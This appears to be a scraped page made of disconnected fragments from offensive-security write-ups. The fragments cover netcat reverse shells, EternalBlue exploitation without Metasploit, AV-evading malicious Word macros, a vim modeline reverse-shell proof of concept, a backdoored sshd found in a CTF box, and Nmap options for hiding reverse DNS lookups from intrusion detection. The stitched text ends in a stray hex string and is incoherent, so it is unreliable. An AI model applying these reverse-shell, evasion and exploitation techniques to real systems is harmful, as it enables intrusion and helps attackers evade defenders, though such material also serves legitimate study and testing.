If you want to reverse the roles, i.e. the High Sierra machine is establishing the connection to the remote device, and giving the remote device access to bash on the HS host, you would move the listen flag (-l). So, the remote device would start netcat first in listen mode:
We will need 3 command window for this to work. one to host our PowerShell Payload, one for the Reverse Shell listener and one which will execute the exploit itself.We can observe it worked. The exploit pulled the file from our server and we got the reverse TCP powershell back.
We now have our exploit binary. All we have to do is to execute the exploit and wait for our shell.Going back one folder and executing the exploit, we are getting and error and a successful reverse shell.
In this long blog post, We looked at multiple ways to use the exploit EternalBlue with and without pipename. We created reverse shells and injected our own administrator user. I hope this blog post clears the confusion among the people trying to Eternal Blue without Metasploit. This is part 1 of this series and more blog posts are on their way. Cheers!
Making our payload undetectable by AV and WAF solutions should be enough to evade most detections, but more and more we see the usage of tools like sysmon to detect binaries launched by IIS and Apache.
Unfortunately, this mode takes me too much time, so I decided to create a small script that allows me to execute commands through the exploit just like in a real reverse shell.
I take it to my machine for a reverse engineering session, but luckily for me, before I start, I check the strings inside and find an interesting hex code.
It appears that a file was downloaded and saved with the name sshd and then changed the creation date of the file. What we are most interested in is the sshd command, which should be the ssh service daemon running on the machine. Probably a modified version, but how? We have therefore come to the moment in which a reverse engineering session should do for us, even if, being a service, probably the parts that interest us will not be launched if we do not connect to the service ... if it starts. We download the file on our machine and proceed, first of all, to take a look at the strings contained in the binary file (too many times in this BOX we have avoided a long reverse engineering session).
In this post we will see how using several simple tricks it is possible to create a malicious macro undetectable by most conventional antivirus. At the end of this post you may find how to prevent these attacks using AV Access protection rules.
We proceed to upload the patched binary to the same location on our server and start listening on port 8888 and finally we open again the Word document. This time, there is not any AV detection and the reverse shell is established. Now the attacker is able to execute commands on our computer from the remote server:
This question includes code from the original description of the vulnerability and proof of concept file. It will in the worst case open a reverse shell that may grant privileges to other users and provide a shell interface to outside attackers. Do not execute this on unless (1) you know that your system is not accessible to third parties (firewall, no multi-user-systems) and (2) you know how to shut the shell down if it accidentally opens.
The idea seems to be that while the text file will appear to onlu contain the string "Nothing here.", it will open a reverse shell /bin/sh on port 9999 with netcat (nc) when opened with unpatched vim/neovim versions.
We can even keep it simpler, and use a simple echo command for the exploit part. Since all we need is to show that we're able to run arbitrary local commands, using echo should be enough to demonstrate (and, if interested, you can confirm that you can successfully replace that with a reverse proxy using nc or similar.)
One probe commonly initiated by IDSs isreverse DNSqueryof the attacker's IP address. A domain name in an alert is morevaluable than just an IP address, after all. Unfortunately, attackerswho control their own rDNS (quite common) can watch the logs in realtime and learn that they have been detected. This is a good time forattackers to feed misinformation, such as bogus names and cacheentries to the requesting IDS.
The most effective way to eliminate this risk is to specify-nto disable all reverse DNS resolution. Theproblem with this approach is that you lose the valuable informationprovided by DNS. Fortunately, Nmap offers a way to gather thisinformation while concealing thesource.A substantial percentage ofDNS servers on the Internet are open to recursive queries from anyone.Specify one or more of those name servers to the--dns-serversoption of Nmap, and all rDNS querieswill be proxied through them. Example 10.21 demonstrates this technique by conducting a list scan of some SecurityFocus IPs while using the public recursive DNS servers 18.104.22.168 and 22.214.171.124 to cover any tracks. Keep in mind that forward DNS stilluses your host's configured DNS server, so specify target IP addressesrather than domain names to prevent even that tiny potentialinformation leak. For this reason, Example 10.21 first shows the Linux host command being used to look up www.securityfocus.com rather than specifying that host name in the Nmap command line. To avoid IDS thresholds based on the number ofrequests from a single DNS server, you may specify dozens ofcomma-separated DNS servers to --dns-servers and Nmapwill round-robin its requests among them. 2b1af7f3a8